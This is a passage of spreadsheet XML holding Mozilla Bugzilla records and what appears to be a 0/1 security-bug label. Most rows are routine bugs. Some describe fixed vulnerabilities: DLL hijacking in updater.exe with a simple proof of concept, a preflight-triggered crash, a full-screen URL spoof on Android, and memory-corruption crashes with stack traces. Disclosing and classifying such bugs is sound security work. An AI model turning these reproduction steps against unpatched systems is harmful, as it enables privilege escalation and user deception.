        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5474" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5474" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N5474" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5474" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5474" t="inlineStr">
        <is>
          <t>ckritzer</t>
        </is>
      </c>
      <c r="Q5474" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5474" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5474" t="inlineStr">
        <is>
          <t>M16</t>
        </is>
      </c>
      <c r="T5474" t="n">
        <v>1</v>
      </c>
      <c r="U5474" t="n">
        <v>0</v>
      </c>
      <c r="V5474" t="n">
        <v>14</v>
      </c>
      <c r="W5474" t="inlineStr">
        <is>
          <t>Using m13 on NT4 sp5, if I go to the URL, there are two problems with the form
1) The Comment box is on the extreme right side, about 10 lines underneath where
it should be.  There's a space for it where it should be, but where it actually
is only shows about 4 characters worth of the box.
2) There's a drop-down box for "Please tell us which story your comment is about
from the list below".  When I click on it, the box appears on the extreme right,
cut off by the edge of the screen (like the comment box on item 1).  You can see
the first 4-5 characters, but that's it.
Hope this helps.  You guys are doing a great job!</t>
        </is>
      </c>
      <c r="X5474" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5475">
      <c r="A5475" t="n">
        <v>945192</v>
      </c>
      <c r="B5475" t="inlineStr">
        <is>
          <t>2013-12-02 02:48:30 -0800</t>
        </is>
      </c>
      <c r="C5475" t="inlineStr">
        <is>
          <t>The updater.exe loads the bcrypt.dll and other dll's from the working and binary directory when not using the service (Application Update)</t>
        </is>
      </c>
      <c r="D5475" t="inlineStr">
        <is>
          <t>2024-05-30 08:30:33 -0700</t>
        </is>
      </c>
      <c r="E5475" t="n">
        <v>1</v>
      </c>
      <c r="F5475" t="n">
        <v>1</v>
      </c>
      <c r="G5475" t="n">
        <v>3</v>
      </c>
      <c r="H5475" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5475" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J5475" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K5475" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5475" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5475" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N5475" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5475" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5475" t="inlineStr">
        <is>
          <t>[adv-main36-][adv-esr31.5-][embargo opening until bug 1127481 fixed]</t>
        </is>
      </c>
      <c r="Q5475" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5475" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5475" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T5475" t="n">
        <v>1</v>
      </c>
      <c r="U5475" t="n">
        <v>0</v>
      </c>
      <c r="V5475" t="n">
        <v>293</v>
      </c>
      <c r="W5475" t="inlineStr">
        <is>
          <t>The updater.exe loads the bcrypt.dll from the update directory, for example while performing an update. That can lead to a privilege escalation while updating without the Mozilla Maintenance Service. I have tested this on win7 pro 32bit with Firefox 25.0.1. 
quick poc 1:
1.) copy the updater.exe from Firefox 25.0.1 and create a "bcrypt.dll" file with no content in the same location
2.) start the updater.exe
3.) a error message will occur, because the update tries to load the empty .dll
Also other .dlls are loaded from the working directory but only the bcrypt.dll is loaded while performing an update without the service from the high integrity updater process.</t>
        </is>
      </c>
      <c r="X5475" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5476">
      <c r="A5476" t="n">
        <v>1164545</v>
      </c>
      <c r="B5476" t="inlineStr">
        <is>
          <t>2015-05-13 10:22:11 -0700</t>
        </is>
      </c>
      <c r="C5476" t="inlineStr">
        <is>
          <t>Sporadic incorrect previous/next unclassified failure navigation</t>
        </is>
      </c>
      <c r="D5476" t="inlineStr">
        <is>
          <t>2015-07-20 16:36:11 -0700</t>
        </is>
      </c>
      <c r="E5476" t="n">
        <v>1</v>
      </c>
      <c r="F5476" t="n">
        <v>1</v>
      </c>
      <c r="G5476" t="n">
        <v>7</v>
      </c>
      <c r="H5476" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5476" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5476" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K5476" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5476" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5476" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5476" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5476" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5476" t="inlineStr"/>
      <c r="Q5476" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5476" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5476" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5476" t="n">
        <v>1</v>
      </c>
      <c r="U5476" t="n">
        <v>0</v>
      </c>
      <c r="V5476" t="n">
        <v>33</v>
      </c>
      <c r="W5476" t="inlineStr">
        <is>
          <t>KWierso has noticed the past week or so, that occasionally during 'j,k,n,p' next/prev failure navigation, the page scroll will end up with the job outside the page boundary.
I think I saw this once last week also.
Wes has noted also today his navigation was cycling in a loop of a tiny subset of the visible failed jobs. This was fixed by a page reload.
This is just a marker bug to keep an eye out for it, and I or Wes or other sheriffs can add a specific Treeherder resultset url to this bug with a reproducible push, or steps to reproduce.</t>
        </is>
      </c>
      <c r="X5476" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5477">
      <c r="A5477" t="n">
        <v>1032227</v>
      </c>
      <c r="B5477" t="inlineStr">
        <is>
          <t>2014-06-30 08:20:01 -0700</t>
        </is>
      </c>
      <c r="C5477" t="inlineStr">
        <is>
          <t>"Address" columns in tables use string sort, not numerical sort</t>
        </is>
      </c>
      <c r="D5477" t="inlineStr">
        <is>
          <t>2021-05-25 13:21:16 -0700</t>
        </is>
      </c>
      <c r="E5477" t="n">
        <v>1</v>
      </c>
      <c r="F5477" t="n">
        <v>1</v>
      </c>
      <c r="G5477" t="n">
        <v>4</v>
      </c>
      <c r="H5477" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5477" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5477" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K5477" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5477" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5477" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5477" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5477" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5477" t="inlineStr"/>
      <c r="Q5477" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5477" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5477" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5477" t="n">
        <v>1</v>
      </c>
      <c r="U5477" t="n">
        <v>0</v>
      </c>
      <c r="V5477" t="n">
        <v>16</v>
      </c>
      <c r="W5477" t="inlineStr">
        <is>
          <t>When I sort the list of crashes by Address, I get things in this order:
0x2b954c
0x2c8c7
0x2cf88000
0x2d003000
0x2e0000
It would be more useful for these to be sorted in numerical order than in alphabetical order.
That was from this link if it makes a difference: https://crash-stats.mozilla.com/report/list?product=Firefox&amp;signature=js%3A%3AGCMarker%3A%3AappendGrayRoot%28void*%2C+JSGCTraceKind%29#tab-reports</t>
        </is>
      </c>
      <c r="X5477" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5478">
      <c r="A5478" t="n">
        <v>644069</v>
      </c>
      <c r="B5478" t="inlineStr">
        <is>
          <t>2011-03-23 00:02:23 -0700</t>
        </is>
      </c>
      <c r="C5478" t="inlineStr">
        <is>
          <t>Crash if javascript code makes more than 100 unique cross domain requests</t>
        </is>
      </c>
      <c r="D5478" t="inlineStr">
        <is>
          <t>2024-05-29 15:49:05 -0700</t>
        </is>
      </c>
      <c r="E5478" t="n">
        <v>1</v>
      </c>
      <c r="F5478" t="n">
        <v>1</v>
      </c>
      <c r="G5478" t="n">
        <v>3</v>
      </c>
      <c r="H5478" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5478" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5478" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5478" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5478" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5478" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N5478" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5478" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5478" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q5478" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5478" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5478" t="inlineStr">
        <is>
          <t>mozilla5</t>
        </is>
      </c>
      <c r="T5478" t="n">
        <v>1</v>
      </c>
      <c r="U5478" t="n">
        <v>0</v>
      </c>
      <c r="V5478" t="n">
        <v>31</v>
      </c>
      <c r="W5478" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16
We have a web page using JQuery 1.5.1 that makes a POST ajax request to a REST web service on another domain.
Firefox sends a preflighting OPTIONS request, then the POST.
If the server responds with a header of Access-Control-Max-Age set to a number of seconds longer than it takes to make 100 unique uri requests, firefox crashes.
On the 101st unique URL post request, Firefox makes the 101st OPTIONS request to the server, which replies, then Firefox crashes with the attached crash dump.
Reproducible: Always
Steps to Reproduce:
1. Edit CrossDomainTest.html line 22 to point to a REST webservice
2. Ensure the webservice response includes a header of Access-Control-Max-Age set to something like "1728000" which is 20 days.
3. Open the page in Firefox
4. On the 101 request Firefox crashes.
Actual Results:  
Firefox crashed and showed the submit crash dump dialog.
Expected Results:  
Firefox should continue to make requests.
This is related to the submitted crash dump 
ID: 7636c991-6b98-4abf-b2c4-7ea2c2110322
Module: xul.dll
When no "Access-Control-Max-Age" header is defined in the web service response Firefox continues to make more than 101 requests. 
We are unsure if this bug could be exploited so we are setting the "Many users could be harmed" option until further investigation confirms the extent of this issue.</t>
        </is>
      </c>
      <c r="X5478" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5479">
      <c r="A5479" t="n">
        <v>1291265</v>
      </c>
      <c r="B5479" t="inlineStr">
        <is>
          <t>2016-08-02 05:44:04 -0700</t>
        </is>
      </c>
      <c r="C5479" t="inlineStr">
        <is>
          <t>Check for repeated client counts in new_records in Fennec dashboard data</t>
        </is>
      </c>
      <c r="D5479" t="inlineStr">
        <is>
          <t>2018-10-15 11:08:31 -0700</t>
        </is>
      </c>
      <c r="E5479" t="n">
        <v>1</v>
      </c>
      <c r="F5479" t="n">
        <v>1</v>
      </c>
      <c r="G5479" t="n">
        <v>6</v>
      </c>
      <c r="H5479" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5479" t="inlineStr">
        <is>
          <t>Cloud Services Graveyard</t>
        </is>
      </c>
      <c r="J5479" t="inlineStr">
        <is>
          <t>Metrics: Pipeline</t>
        </is>
      </c>
      <c r="K5479" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5479" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5479" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5479" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5479" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5479" t="inlineStr">
        <is>
          <t>[measurement:client]</t>
        </is>
      </c>
      <c r="Q5479" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5479" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5479" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5479" t="n">
        <v>1</v>
      </c>
      <c r="U5479" t="n">
        <v>0</v>
      </c>
      <c r="V5479" t="n">
        <v>4</v>
      </c>
      <c r="W5479" t="inlineStr">
        <is>
          <t>One hypothesis for d0/.../d30 being off in bug 1284932 is, that we count clients in these more than once.
We need to confirm this with an analysis.</t>
        </is>
      </c>
      <c r="X5479" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5480">
      <c r="A5480" t="n">
        <v>1356596</v>
      </c>
      <c r="B5480" t="inlineStr">
        <is>
          <t>2017-04-14 09:33:39 -0700</t>
        </is>
      </c>
      <c r="C5480" t="inlineStr">
        <is>
          <t>Spoof page in full screen mode Firefox Android with "scroll"</t>
        </is>
      </c>
      <c r="D5480" t="inlineStr">
        <is>
          <t>2024-05-30 09:31:45 -0700</t>
        </is>
      </c>
      <c r="E5480" t="n">
        <v>1</v>
      </c>
      <c r="F5480" t="n">
        <v>1</v>
      </c>
      <c r="G5480" t="n">
        <v>6</v>
      </c>
      <c r="H5480" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5480" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J5480" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5480" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L5480" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5480" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5480" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5480" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5480" t="inlineStr">
        <is>
          <t>[adv-main56+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q5480" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5480" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5480" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T5480" t="n">
        <v>1</v>
      </c>
      <c r="U5480" t="n">
        <v>0</v>
      </c>
      <c r="V5480" t="n">
        <v>72</v>
      </c>
      <c r="W5480" t="inlineStr">
        <is>
          <t>Created attachment 8858338
poc1.html
User Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Steps to reproduce:
1.Go to http://laraweron.mysit.ru/poc.html
2.Scroll down the page
3.Click on the link
Actual results:
In the browser version Firefox for Android v52.02, when entering full-screen mode, absent notification. Under certain circumstances, an attacker can replace a page or address page in the browser.When we scroll down the page in the browser, the address bar is automatically hidden, if the full-screen mode is enabled in this mode, the user will not notice it. When you navigate to another page in your browser, an error occurs.
Expected results:
The browser opens a new window in full-screen mode, deleting the address bar.
Verified by
Mozilla Firefox 52.02
Android 4.22
Android 5.0.1</t>
        </is>
      </c>
      <c r="X5480" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5481">
      <c r="A5481" t="n">
        <v>1087271</v>
      </c>
      <c r="B5481" t="inlineStr">
        <is>
          <t>2014-10-22 04:15:06 -0700</t>
        </is>
      </c>
      <c r="C5481" t="inlineStr">
        <is>
          <t>Joint MoCo/MoFo Contributor Analysis Project</t>
        </is>
      </c>
      <c r="D5481" t="inlineStr">
        <is>
          <t>2015-01-28 05:41:02 -0800</t>
        </is>
      </c>
      <c r="E5481" t="n">
        <v>1</v>
      </c>
      <c r="F5481" t="n">
        <v>1</v>
      </c>
      <c r="G5481" t="n">
        <v>5</v>
      </c>
      <c r="H5481" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5481" t="inlineStr">
        <is>
          <t>Mozilla Foundation</t>
        </is>
      </c>
      <c r="J5481" t="inlineStr">
        <is>
          <t>Metrics</t>
        </is>
      </c>
      <c r="K5481" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5481" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5481" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5481" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5481" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5481" t="inlineStr">
        <is>
          <t>[metrics][Nov28]</t>
        </is>
      </c>
      <c r="Q5481" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5481" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5481" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5481" t="n">
        <v>1</v>
      </c>
      <c r="U5481" t="n">
        <v>0</v>
      </c>
      <c r="V5481" t="n">
        <v>1</v>
      </c>
      <c r="W5481" t="inlineStr">
        <is>
          <t>This bug is just for visibility in the MoFo metrics heartbeat schedule. 
All tasks are tracking on this page:
https://wiki.mozilla.org/Contribute/analysis</t>
        </is>
      </c>
      <c r="X5481" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5482">
      <c r="A5482" t="n">
        <v>733282</v>
      </c>
      <c r="B5482" t="inlineStr">
        <is>
          <t>2012-03-05 21:13:00 -0800</t>
        </is>
      </c>
      <c r="C5482" t="inlineStr">
        <is>
          <t>Crash in nsHtml5TreeBuilder | ASSERTION: The Unicode decoder wrote too much data.: 'end &lt;= NS_HTML5_STREAM_PARSER_READ_BUFFER_SIZE' | ASSERTION: The decoder signaled an error other than NS_ERROR_ILLEGAL_INPUT.: 'convResult == NS_ERROR_ILLEGAL_INPUT'</t>
        </is>
      </c>
      <c r="D5482" t="inlineStr">
        <is>
          <t>2018-08-01 19:39:37 -0700</t>
        </is>
      </c>
      <c r="E5482" t="n">
        <v>1</v>
      </c>
      <c r="F5482" t="n">
        <v>1</v>
      </c>
      <c r="G5482" t="n">
        <v>6</v>
      </c>
      <c r="H5482" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5482" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5482" t="inlineStr">
        <is>
          <t>History: Global</t>
        </is>
      </c>
      <c r="K5482" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5482" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5482" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5482" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5482" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5482" t="inlineStr">
        <is>
          <t>[sg:critical][qa+:ashughes]</t>
        </is>
      </c>
      <c r="Q5482" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5482" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5482" t="inlineStr">
        <is>
          <t>mozilla14</t>
        </is>
      </c>
      <c r="T5482" t="n">
        <v>1</v>
      </c>
      <c r="U5482" t="n">
        <v>0</v>
      </c>
      <c r="V5482" t="n">
        <v>24</v>
      </c>
      <c r="W5482" t="inlineStr">
        <is>
          <t>1. http://www.kogakkan-u.ac.jp/users/sirayama/index.html
   perhaps reload
2. Crash Nightly/13. I can't reproduce with Aurora/12 or Beta/11.
###!!! ASSERTION: The Unicode decoder wrote too much data.: 'end &lt;= NS_HTML5_STREAM_PARSER_READ_BUFFER_SIZE', file /work/mozilla/builds/nightly/mozilla/parser/html/nsHtml5StreamParser.cpp, line 829
###!!! ASSERTION: The decoder signaled an error other than NS_ERROR_ILLEGAL_INPUT.: 'convResult == NS_ERROR_ILLEGAL_INPUT', file /work/mozilla/builds/nightly/mozilla/parser/html/nsHtml5StreamParser.cpp, line 836
Mac OS X 10.5
bp-d4c07014-dc00-4446-9f2d-f27532120306
Firefox 13.0a1 Crash Report [@ small_free_list_remove_ptr | small_malloc_from_free_list | szone_malloc ] 
bp-1cdb6ee0-3e92-4686-8a82-bb2d72120306
Firefox 13.0a1 Crash Report [@ small_free_list_remove_ptr | szone_free | free | nsHtml5DataAvailable::~nsHtml5DataAvailable ] 
Windows XP
bp-fafa95bc-780e-4162-a0e0-7d8cd2120306
Firefox 13.0a1 Crash Report [@ nsHtml5TreeBuilder::flushCharacters() ] 
Windows 7
bp-f10abc9a-e10d-4d73-aaa5-99d232120306
Firefox 13.0a1 Crash Report [@ RtlEnterCriticalSection ] 
On Windows 7 with a debug build I saw 
Assertion failure: local &lt; script-&gt;nfixed, at c:/work/mozilla/builds/nightly/moz
illa/js/src/jsanalyze.cpp:186
And in Crash automation on Mac OS X 10.6 I saw
Assertion failure: (ptrBits &amp; 0x7) == 0
Operating system: Mac OS X
                  10.6.8 10K549
CPU: amd64
     family 6 model 23 stepping 10
     2 CPUs
Crash reason:  EXC_BAD_ACCESS / KERN_INVALID_ADDRESS
Crash address: 0x0
Thread 0 (crashed)
 0  libmozglue.dylib!MOZ_Crash [Assertions.cpp : 76 + 0x5]
    rbx = 0x00000001002078d0   r12 = 0x0000000103082502
    r13 = 0x0000000100107bb0   r14 = 0x0000000000000010
    r15 = 0x0000000100107bb0   rip = 0x0000000100010e17
    rsp = 0x00007fff5fbf8f80   rbp = 0x00007fff5fbf8f80
    Found by: given as instruction pointer in context
 1  libmozglue.dylib!MOZ_Assert [Assertions.cpp : 88 + 0x4]
    rbx = 0x00000001002078d0   r12 = 0x0000000103082502
    r13 = 0x0000000100107bb0   r14 = 0x0000000000000010
    r15 = 0x0000000100107bb0   rip = 0x0000000100010e79
    rsp = 0x00007fff5fbf8f90   rbp = 0x00007fff5fbf8fb0
    Found by: call frame info
 2  XUL!JSVAL_TO_OBJECT_IMPL [jsval.h : 766 + 0x23]
    rbx = 0x00000001002078d0   r12 = 0x0000000103082502
    r13 = 0x0000000100107bb0   r14 = 0x0000000000000010
    r15 = 0x0000000100107bb0   rip = 0x0000000103654032
    rsp = 0x00007fff5fbf8fc0   rbp = 0x00007fff5fbf8fe0
    Found by: call frame info
 3  XUL!JS::Value::toObject [jsapi.h : 544 + 0xb]
    rbx = 0x00000001002078d0   r12 = 0x0000000103082502
    r13 = 0x0000000100107bb0   r14 = 0x0000000000000010
    r15 = 0x0000000100107bb0   rip = 0x0000000103678308
    rsp = 0x00007fff5fbf8ff0   rbp = 0x00007fff5fbf9000
    Found by: call frame info
 4  XUL!js::GCMarker::processMarkStackTop [jsgcmark.cpp : 1090 + 0x8]
    rbx = 0x00000001002078d0   r12 = 0x0000000103082502
    r13 = 0x0000000100107bb0   r14 = 0x0000000000000010
    r15 = 0x0000000100107bb0   rip = 0x0000000103701752
    rsp = 0x00007fff5fbf9010   rbp = 0x00007fff5fbf90b0
    Found by: call frame info
 5  XUL!js::GCMarker::drainMarkStack [jsgcmark.cpp : 1172 + 0xc]
    rbx = 0x00000001002078d0   r12 = 0x0000000103082502
    r13 = 0x0000000100107bb0   r14 = 0x0000000000000010
    r15 = 0x0000000100107bb0   rip = 0x00000001036fe751
    rsp = 0x00007fff5fbf90c0   rbp = 0x00007fff5fbf9100
    Found by: call frame info
 6  XUL!MarkAndSweep [jsgc.cpp : 3293 + 0x13]
    rbx = 0x00000001002078d0   r12 = 0x0000000103082502
    r13 = 0x0000000100107bb0   r14 = 0x0000000000000010
    r15 = 0x0000000100107bb0   rip = 0x00000001036e2efb
    rsp = 0x00007fff5fbf9110   rbp = 0x00007fff5fbf9190
    Found by: call frame info
 7  XUL!GCCycle [jsgc.cpp : 3644 + 0xb]
    rbx = 0x00000001002078d0   r12 = 0x0000000103082502
    r13 = 0x0000000100107bb0   r14 = 0x0000000000000010
    r15 = 0x0000000100107bb0   rip = 0x00000001036e30e6
    rsp = 0x00007fff5fbf91a0   rbp = 0x00007fff5fbf9210
    Found by: call frame info
s-s due to all of the various crashes related to memory and gc.</t>
        </is>
      </c>
      <c r="X5482" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5483">
      <c r="A5483" t="n">
        <v>444406</v>
      </c>
      <c r="B5483" t="inlineStr">
        <is>
          <t>2008-07-09 11:55:43 -0700</t>
        </is>
      </c>
      <c r="C5483" t="inlineStr">
        <is>
          <t>Adobe Flash character map is incorrectly passing in + (plus sign) as the = (equal sign) keystroke.</t>
        </is>
      </c>
      <c r="D5483" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E5483" t="n">
        <v>1</v>
      </c>
      <c r="F5483" t="n">
        <v>1</v>
      </c>
      <c r="G5483" t="n">
        <v>6</v>
      </c>
      <c r="H5483" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5483" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5483" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K5483" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5483" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5483" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5483" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5483" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5483" t="inlineStr"/>
      <c r="Q5483" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5483" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5483" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5483" t="n">
        <v>1</v>
      </c>
      <c r="U5483" t="n">
        <v>1</v>
      </c>
      <c r="V5483" t="n">
        <v>16</v>
      </c>
      <c r="W5483" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0
When typing in an Adobe Flash file, hitting the = key will actually type +. I believe this is due to an incorrect character keystroke mapping that is sent to flash. Equals signs show up properly in flash. You can copy and paste other equals signs, but you cannot type a new one as it will just be typed as a plus sign.
Reproducible: Always
Steps to Reproduce:
1. Go to http://www.millerhighlife.com
2. Complete age verification
3. On the main page, click "Browse" where it says "Miller High Life Extras". (this is located underneath the headline and right below the main navigation)
4. Type = into the Email Address Field in the site that pops up (in a popup)
5. Note that it will type +
Actual Results:  
You cannot type an equals sign; it will always render as a plus sign.
Expected Results:  
Adobe Flash should have the correct keystroke mappings and you should be able to type an equals sign.
This was tested on several computers with Firefox 3 and was reproducible every time.</t>
        </is>
      </c>
      <c r="X5483" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5484">
      <c r="A5484" t="n">
        <v>797260</v>
      </c>
      <c r="B5484" t="inlineStr">
        <is>
          <t>2012-10-02 21:45:47 -0700</t>
        </is>
      </c>
      <c r="C5484" t="inlineStr">
        <is>
          <t>Tracking bug for build and release of SeaMonkey 2.13 Beta 6</t>
        </is>
      </c>
      <c r="D5484" t="inlineStr">
        <is>
          <t>2012-10-18 06:07:55 -0700</t>
        </is>
      </c>
      <c r="E5484" t="n">
        <v>1</v>
      </c>
      <c r="F5484" t="n">
        <v>1</v>
      </c>
      <c r="G5484" t="n">
        <v>2</v>
      </c>
      <c r="H5484" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5484" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J5484" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="K5484" t="inlineStr">
        <is>
          <t>SeaMonkey 2.13 Branch</t>
        </is>
      </c>
      <c r="L5484" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5484" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5484" t="inlineStr">
        <is>
